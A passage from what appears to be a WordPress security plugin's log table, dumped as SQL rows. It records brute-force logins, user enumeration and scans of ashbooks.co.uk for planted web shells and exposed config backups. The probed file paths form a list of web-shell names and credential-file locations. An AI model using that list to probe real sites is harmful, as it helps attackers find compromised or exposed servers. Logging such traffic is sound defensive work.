|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('157.245.156.140',2650119308,'',0,1637789726.4878,70,'He9NxgZ4hpVc5Dm3OzAl0Iv2','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.30.231.155',1159653275,'admin',0,1637795405.4176,7,'QFz4Sp1CWGcI7bweTLdPnvOt','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1637797450.2091,55,'nR95sJIOouPyLeA3lN2tkvKq','','19|0|0|0|ashbooks.co.uk/chart/php-ofc-library/ofc_upload_image.php'),('114.119.131.97',1920435041,'',0,1637804085.9988,55,'7iy8m1r0xCuqBsUjHal5QgSk','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('40.69.131.238',675644398,'',0,1637809697.2966,55,'e5BJLS9WzvuKtXcqPkEfHmQC','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637809698.0003,55,'QoMs1c5eLyvjqIhmVNPT24b8','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637809698.8658,55,'8ha2E0fxM3onRVzKqsQwD56e','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637809699.9049,55,'3KhzjNFWtfwqCHEvx9mdMZGT','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637809702.1113,55,'Fh4ixVkYqBpzLmcHlUC27NgW','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637809702.1874,10,'Fh4ixVkYqBpzLmcHlUC27NgW','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637809703.0561,55,'E0dIiYTuyZ1mAQXzR269NCok','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637809704.7147,55,'uzYMUv2oVCrBg8D71NjT9ifp','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637809705.7793,100,'rsHuCqzF2RJIYkQleVW01Liw','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637809707.4595,100,'hLsM98kImFW5BnbwoqP3pA2j','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637809708.7531,100,'RCcPgxpTXZHBGqjrN7o4i9wF','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637809709.7236,100,'yoElf6naVA49TY7LgqUBQWHM','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637809710.5906,55,'2rS6iTV4OzwAkZ8LxJuyChGB','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637809711.4526,55,'1AMND3yeHkYKLZxqzr2aBVUw','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637809712.4025,55,'dtEyJ1Nrih8Vf2wPgHMvj6RW','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637809713.0845,55,'x2nsX6pDybWJqEo94iATeHjC','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637809713.9143,55,'6Dko8YlTCrbw7WFcLMg4uGNe','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637809714.5285,55,'SbsJQx03EtnrXzemBd56M7Gf','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637809715.1474,55,'ak0K984PEGDS2QpjFVbOdfg1','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637809716.0587,55,'IExTcvj25zeR8JM3ndao7CZb','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637809716.9226,55,'awAei7gXZPMLSDQuInvF6qhB','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637809717.7960,55,'XdwBaHfZSJKutElVpIALe0Ug','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637809718.7172,55,'ZKG3QYTjvtl5PNwmFpBaouEr','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637809719.6006,55,'xzJ0P3CKiprvmMgWBh7cQnuE','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637809720.4814,55,'aoN8c4kK1b3eWUfrQM6iXRZD','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637809721.1266,55,'xLp2MyBCsJ4GwQEmhDKRHftW','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637809722.0506,55,'q0kVYtQ2Xu9Ti1CNbZHye34O','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637809722.9182,18,'MZsV9QLUjTvuFAWwdgNDlBK2','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637809723.7567,55,'PQDBm9c43dC0SbWOGrfXYEKq','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637809724.6275,100,'aRUEcGdyOmiS4tHrQKFAlBnw','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637809725.5146,100,'4gxi7tmXaEOfWYk3eLNKFsHU','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637809726.1754,55,'otFLqEKcP0G4sU5wHkCOYlbQ','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637809727.0654,100,'BNWwZ8M4UoOGsxYq1uaHfDzX','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637809727.9449,55,'GhyQVnrxAH4lUugIcSFP0jMB','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637809728.8010,55,'Y1sXaEPCtIqA4KVzUp6xc0Zo','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637809729.6859,55,'z5dIHUETAtrwMQvsBi1h23Sm','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637809730.5834,55,'mOEobzR5ZjLvnNe0rUp3iwAQ','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637809731.4542,55,'Yo0PxJRdC2zb9vZsSHwTr6aB','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637809732.1371,55,'kW07DlbcLmCeIuY4sQrOFTx6','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637809733.0354,55,'hSngz79kJCjsO6owufbrL2VR','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637809733.8816,100,'ksyzWCPBVdrwx0ebpclTU9Zm','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637809734.7612,55,'O46Df5TWaMdVknhNlbCS1YZg','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637809735.6545,55,'riDhb0yHQV69uF85M7SXJGv3','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637809736.5138,55,'yhwOUHV4N08DZbFM6fmAdIau','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('107.150.57.35',1805007139,'admin',0,1637811595.1912,7,'31Ic4GE08Lqn75VZAwk9Jlrt','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('157.245.156.140',2650119308,'',0,1637817528.5373,70,'wJoYvyTI2s5AmpEgXOGC1W8h','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.197.160.228',1170579684,'admin',0,1637827751.0721,7,'9JejLkYuwNTQKSoxBvIEdg0O','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.103.199.116',3110586228,'',0,1637830556.6686,55,'LTdJ5Of47DUsqHAaeIVwRGpZ','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('195.154.82.73',3281670729,'',0,1637833328.7052,70,'s1CxG4NclY3Eh0XAU5yFZRMP','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('5.2.77.22',84036886,'ashbooks',0,1637837622.0851,51,'mXa56SFZfh3sBGuEAbLK9Mvr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.48.235',1805005035,'admin',0,1637841003.9037,7,'7bUpKwJcWhHtumBGIaAEzqv1','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('114.119.131.88',1920435032,'',0,1637841408.3138,55,'QY2w8VEbFD6qvl0nLkdm4MzA','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('89.207.146.189',1506775741,'admin',0,1637847839.6261,7,'LQ2358gHCOcnE9PNAqBjYyfi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.52.97.144',3325321616,'admin',0,1637851257.3031,7,'OTS4LZX6KIAYn795yG1VJN0u','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.203.115.159',2680910751,'admin',0,1637852251.4627,7,'gP1ukdtZxvQVTH4L6N0r7wjC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.65.238.248',2671898360,'admin',0,1637853296.1827,7,'6kKYCBGPh2f1WTqnsEmSRF7H','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.156.140',2650119308,'',0,1637853885.0739,70,'w8tGHnfyUalvWCV2jukpBJEX','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('167.114.144.40',2809303080,'admin',0,1637854409.2491,7,'8DcXZKWtPxdmwiHqAkuRpLzN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.220.215',2160581847,'admin',0,1637855411.8403,7,'GXdNqV9gms5kzMO20EwYnRjI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.15.239',2703429615,'admin',0,1637856601.0503,7,'TINMPcmHq0uSkRiznK5wAet6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('209.97.162.248',3512836856,'admin',0,1637857770.8393,7,'1XKQpga2SWF45TYVHuc0Nofr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.88.38.58',391652922,'admin',0,1637859042.2294,7,'lHmwvVkbo1fsNIYM0AZFyEXh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('166.62.125.246',2789113334,'admin',0,1637860500.7383,7,'BnwdFNv7AjirXDp0IxYtV42q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.94.99',2703449699,'admin',0,1637861519.5534,7,'6vJG2gPZM5TIr1VYbeNKWcQm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861519.5991,70,'7d9qnLiN8XvhcwRBYySQOpDu','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('162.250.127.234',2734325738,'',0,1637861519.8366,70,'JmPKg29w6on1tkuh3l5dj04r','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/2'),('162.250.127.234',2734325738,'',0,1637861520.0652,70,'JOHMzvPNtqWwxV23IE9X8Zas','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/3'),('162.250.127.234',2734325738,'admin',0,1637861520.8882,7,'q0UJeGN9yCYWi5bnmZlEsXhH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'admin',0,1637861521.5289,7,'UHeZhpiGkBo8QY9l4SVbsCwL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'admin',0,1637861522.3128,7,'7LvmQefNMxlRnHszAXrVj62y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'admin',0,1637861522.7284,7,'LNTj2nvF9mHYlxwqPkr3QOaz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'admin',0,1637861523.3168,7,'HzWw6SgkpuDAdCf4yQlKBnMv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861523.3523,10,'HzWw6SgkpuDAdCf4yQlKBnMv','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861523.8144,50,'P8KpSoJONm92hc541XV0Bt6z','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861525.3191,50,'FRdjLkugH6NnwvC3ptmTZ059','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861526.7152,50,'7PkO3elAMf81qRFQw4xUyn9D','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861527.3482,50,'VfetY02obriLlI9wdXWZGqT8','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861527.7519,50,'WfcZyYhVs17LNtqjxdMRQrzp','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861528.4210,50,'TGerSOEHmLX1pKVhw9ANYRox','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861528.8465,50,'2fpHxeRkmbj4ENTODZU3FLi8','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861529.4576,50,'Zdi2gYNjzGQPE40Sk7R6Vt8H','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861529.8577,50,'lbJXEQYLw4CoUzkRa0xPv3r2','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861530.5576,50,'JgaPhdNACHvpSc9Ln2efRxIs','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861530.6022,10,'JgaPhdNACHvpSc9Ln2efRxIs','','711|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861530.9976,50,'lxUhabNWfqOspXETcKig8VF6','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861531.4298,50,'Bolpgt0kQjLJ7mYM2UENFIei','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861531.9101,50,'Ea0DNG273gbvowOX9FnekRBI','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861532.5765,50,'ryWGXC9E1w2ukQqRozptalYh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861532.9730,50,'VbYr7ktOKqlSLApHJ43Wdi6u','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.250.127.234',2734325738,'',0,1637861533.6064,50,'0dMI6a7RWhl3mOYDuFGBpjJz','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.151.104.89',345466969,'',0,1637863323.4160,70,'6KIkVpMRhLPAcinmvxYfstWZ','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('107.150.57.35',1805007139,'admin',0,1637863628.8744,7,'lnVKLpqjRY1IAwW6t9mUeOfb','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('47.242.19.52',804393780,'admin',0,1637864010.8570,7,'JVgIEZiwBaW3GMtouNRr7pxc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.94.163.77',2606670669,'admin',0,1637866390.0209,7,'7EeiHtDBWnxyOI0FbrhzuvpA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.94.120.151',392067223,'admin',0,1637867855.6943,7,'1hlFVBGSnYukwErgLC0sxTMf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('111.231.4.211',1877411027,'admin',0,1637869180.1920,7,'AQ8c2riKxfMFpy5VWksuqmTa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.76.102.246',2420926198,'admin',0,1637870397.5413,7,'xSGIHNa6uVRjLW7gYXbFtJOE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('133.130.103.36',2239915812,'admin',0,1637871778.4633,7,'X4tqa2ZFSAr9gWfoMevz0PQ5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.3.203',1608057803,'admin',0,1637872809.7873,7,'CNX3BVF59LwaJ10eQ8boukZA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('1.15.144.23',17797143,'admin',0,1637873817.0057,7,'ac6TztbIPeiCAhLywMuR7ES4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.1.143',3164995983,'admin',0,1637876155.1255,7,'wosGk5K8W7jU3LfzplDQytxI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('106.52.171.211',1781836755,'admin',0,1637877147.2066,7,'ylJc6POBj5qeRKpgEAoDIFYd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.6.208.106',3255226474,'admin',0,1637878317.5053,7,'0xwBJe3gV6k9GNSEZqLWf58m','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.9.143.94',3641282398,'admin',0,1637879393.2955,7,'kzNXPY84Kv0UWniJB91Z2GHt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.26',1159655450,'admin',0,1637879683.8973,7,'2otwGXrRpJfuLE0zg98MKDxF','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('167.86.118.101',2807461477,'admin',0,1637881809.5273,7,'co4ETR8ICWgyuL2BPknGAt07','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637882722.4137,55,'vpjB0ZfhNU19GL56dknrAHzX','','19|0|0|0|ashbooks.co.uk/wp-includes/Requests/Exception/HTTP/512.php'),('157.245.95.172',2650103724,'admin',0,1637883040.7876,7,'m5LcO4vNJnxBkoS2sFPHGq8E','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('148.72.214.245',2487801589,'admin',0,1637884292.0649,7,'2RbTs38M9qK71iXFg5u0QUSY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.6.208.106',3255226474,'admin',0,1637885536.3445,7,'TOr4ZQWsgY3oGj1qlANMBS7R','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.216.221.91',1608047963,'admin',0,1637886532.3851,7,'mBDJdUQrMvY206btF95Sl1o8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.163.223.126',883154814,'admin',0,1637887537.8374,7,'b2SMoqUlzLcCJ09HsrX4Wn7h','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('116.255.160.108',1962909804,'admin',0,1637888640.8038,7,'ZsU0z4jSbGAotdQTrayMX6p7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.55.85.219',2721535451,'',0,1637889254.2316,55,'bzEsMNBS26F1rUTaGeh7w5VH','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('208.113.160.8',3497107464,'admin',0,1637890132.2976,7,'wjBlDyfVcbk0u9RdFHvzm1Se','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.151.64.197',2996256965,'admin',0,1637892699.2807,7,'MEmTrXoWNt9J7ezqQACvydfj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1637893454.0768,7,'8qr0R6QMA5JzWefUmZCOLEdw','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('173.236.184.125',2917972093,'admin',0,1637893767.7140,7,'STkCrGsbNyog3ch9e1qnpF2L','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'editor',0,1637895974.9200,51,'yCPBg8UZlH9FaN2dOsvj3GMk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('47.241.15.39',804327207,'admin',0,1637897084.2897,7,'jI93SHh1rL2YqyvzK8clMaRf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('116.203.177.233',1959506409,'admin',0,1637898124.6294,7,'hOHNBSwuLp16GVfatjZseITC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.104.211.150',1567150998,'admin',0,1637899116.3886,7,'fy7kouVQN0IzCiwrXWl6batR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637900278.6056,55,'ZQKSa2XjF8GhsbD9CkpEUH4e','','19|0|0|0|ashbooks.co.uk/wp_wrong_datlib.php'),('5.188.62.140',96222860,'alex',0,1637900336.4002,51,'SJ9RvGhEMeo6KQ52gUkCWdzu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.252.110.1',3338432001,'admin',0,1637900388.4721,7,'z0mgutGroH74pXFZC2MWPYjT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1637901587.0184,7,'YKViW8ThaqAtHBMfQgrwCkDL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('88.198.22.11',1489376779,'admin',0,1637902639.0077,7,'9v0Vk6IpYwtn5QsjHWlqG1Cy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('207.244.233.113',3488934257,'admin',0,1637903789.4471,7,'6Jxn2B7pAMCGdob1DZ8wElaK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'lukas',0,1637904695.9132,51,'pT8Xh5xQBWH4e2f0r63cMVas','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('74.208.25.176',1255152048,'admin',0,1637904810.4686,7,'Itzp2WPqfDdr6s4obLgOhkZG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.255.253.175',100662703,'',0,1637905144.5328,55,'kviBUmEPs6ngC8z5LYpT3rqf','','19|0|0|0|ashbooks.co.uk/weblog/index.php'),('69.163.232.79',1168369743,'admin',0,1637905826.2826,7,'3P2UR6VlJsardA9htXT84GY5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.170.189',2783161021,'admin',0,1637907077.6586,7,'cYQHBX68JqjlLMrf9KRWsFpx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.88.38.58',391652922,'admin',0,1637908115.1564,7,'nkTN5ASz0lR1jLf4tUbZEmCe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.202',3233511114,'admin',0,1637908179.7532,7,'I5sT1W7CU8zlf6S4YHeOVpgy','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'michael',0,1637909059.7088,51,'EribAySCZ1UjdR0aTKW4fcG3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.243.55.192',3119724480,'admin',0,1637909118.1979,7,'GDTkEwIxlLvCpfm1PBU0zQaq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.186.26.189',884611773,'',0,1637909722.9653,55,'MBjOR9Ft14agc6JfrZCIPw8G','','19|0|0|0|ashbooks.co.uk/mt/DIZ.php'),('52.186.26.189',884611773,'',0,1637909724.1602,55,'OcnSwofJPY3ubzhptVdsql7R','','19|0|0|0|ashbooks.co.uk/DKIZ.php'),('94.23.83.103',1578586983,'admin',0,1637912701.6186,7,'XWkCRQHeJ04OPTfbMqu7NE6s','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'daniel',0,1637913418.3345,51,'HK9yWk2mhUMrx4do5iXRPZVN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.235.115',2916412275,'admin',0,1637914986.4935,7,'9ZrRmgnDxtHqpsPv0aVTWyOf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.220.215',2160581847,'admin',0,1637916054.9526,7,'joRiT8pKVceFnWCNvML1zfmG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'philipp',0,1637917802.3902,51,'Oy2AleuCmHgLD05Qkt3GR6Pw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('68.183.108.18',1152871442,'admin',0,1637921749.4486,7,'MX6KeEtTy0wQ5SUZOg8JYHFP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'jonas',0,1637922169.9094,51,'WbiqPvemQo64r2O1axVNY0Xn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.89.201.91',2673461595,'admin',0,1637922842.9855,7,'RBNQ1Zm9WroydzugKbhAMfkP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.130.218.178',1736628914,'admin',0,1637923955.6710,7,'oHdEGXk0xrWnf1pJlNICRm58','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.58.88.114',3258603634,'',0,1637925592.8155,55,'BpctJf4omZV3GzQlDjFWaKw5','','19|0|0|0|ashbooks.co.uk/dz.php'),('194.58.88.114',3258603634,'',0,1637925593.4118,55,'JUQVnehrcADqTR49NisMHapl','','19|0|0|0|ashbooks.co.uk/LeafE.php'),('194.58.88.114',3258603634,'',0,1637925593.7150,55,'1WQrChqwkGldDaL6Eys5pBKP','','19|0|0|0|ashbooks.co.uk/fw.php'),('194.58.88.114',3258603634,'',0,1637925593.9887,55,'vMaE5jWredcgOKuYFqwRl3pX','','19|0|0|0|ashbooks.co.uk/leafmailer2.8.php'),('194.58.88.114',3258603634,'',0,1637925594.5042,55,'nNLOsdtc9BvVl4xUkuXCa2qI','','19|0|0|0|ashbooks.co.uk/leaf.php'),('194.58.88.114',3258603634,'',0,1637925594.5478,10,'nNLOsdtc9BvVl4xUkuXCa2qI','','707|0|0|0|ashbooks.co.uk/leaf.php'),('194.58.88.114',3258603634,'',0,1637925594.8004,55,'CBQme8ktNYx2aHqfuzcLniUr','','19|0|0|0|ashbooks.co.uk/alex.php'),('194.58.88.114',3258603634,'',0,1637925595.3434,55,'voPAzI9epUut7NqjYmdSCF0w','','19|0|0|0|ashbooks.co.uk/mailer.php'),('194.58.88.114',3258603634,'',0,1637925595.6030,55,'SU7HczyRnsd21CZJO9DpLiIl','','19|0|0|0|ashbooks.co.uk/anone.php'),('194.58.88.114',3258603634,'',0,1637925595.9011,55,'8UThtIS2q5Ls4plJ9a6omzu1','','19|0|0|0|ashbooks.co.uk/a.php'),('194.58.88.114',3258603634,'',0,1637925596.4185,55,'L3PlUm27hdOsAvtMBfInqzri','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('194.58.88.114',3258603634,'',0,1637925596.7220,55,'0menMd3JFfUN4KtI98RuCZqp','','19|0|0|0|ashbooks.co.uk/alfa.php'),('194.58.88.114',3258603634,'',0,1637925596.9894,55,'L4eVij0kORpWlqZYMbxg3yUG','','19|0|0|0|ashbooks.co.uk/wso.php'),('194.58.88.114',3258603634,'',0,1637925597.5387,55,'p4nzKLNv0ftlMPj81iARhUGD','','19|0|0|0|ashbooks.co.uk/c.php'),('194.58.88.114',3258603634,'',0,1637925597.8777,55,'x0sWDN76H3Ylm9Z2aqzhc1fp','','19|0|0|0|ashbooks.co.uk/1.php'),('194.58.88.114',3258603634,'',0,1637925598.3967,55,'2hHWBmf4YO8n36cxy05DqtF1','','19|0|0|0|ashbooks.co.uk/send.php'),('194.58.88.114',3258603634,'',0,1637925598.6563,55,'w1psz7XKDtmFCTPo0E5vcQUV','','19|0|0|0|ashbooks.co.uk/3.php'),('194.58.88.114',3258603634,'',0,1637925599.0022,55,'sCJtEwoT9OWA40GnULPV3BF7','','19|0|0|0|ashbooks.co.uk/404.php'),('194.58.88.114',3258603634,'',0,1637925599.5204,55,'glpOAnzvGWFxR6DPSTVYwUdH','','19|0|0|0|ashbooks.co.uk/sym.php'),('194.58.88.114',3258603634,'',0,1637925599.8109,55,'gLlX3izZrH06DU7G9duBMJ5N','','19|0|0|0|ashbooks.co.uk/wp-confirm.php'),('194.58.88.114',3258603634,'',0,1637925600.3305,55,'Gor5eYDAiF1SZy07jKHbINkt','','19|0|0|0|ashbooks.co.uk/images/vuln.php'),('194.58.88.114',3258603634,'',0,1637925600.5910,55,'RZLDa2H0E9edhQ4tcv5ubUSI','','19|0|0|0|ashbooks.co.uk/dr.php'),('194.58.88.114',3258603634,'',0,1637925600.8814,55,'vstZdxTmGKp79qIVyDzkWEa8','','19|0|0|0|ashbooks.co.uk/upload.php'),('194.58.88.114',3258603634,'',0,1637925601.4076,55,'t7sT4YVX2M8ulA6KczHDaW1N','','19|0|0|0|ashbooks.co.uk/bypass.php'),('194.58.88.114',3258603634,'',0,1637925601.6614,55,'dI5cSQhuwYngzWEVp4Kbo1Hv','','19|0|0|0|ashbooks.co.uk/wp-blog.php'),('194.58.88.114',3258603634,'',0,1637925601.9091,55,'ElkwfaL6xPQBN4YCOvgsW2M1','','19|0|0|0|ashbooks.co.uk/data.php'),('194.58.88.114',3258603634,'',0,1637925602.4498,55,'muDSdXN579F4Csl2LBPjaIqv','','19|0|0|0|ashbooks.co.uk/owl.php'),('194.58.88.114',3258603634,'',0,1637925602.7688,55,'uCrXJ3SaOdRGZmHWNxUFysfV','','19|0|0|0|ashbooks.co.uk/vuln.php'),('194.5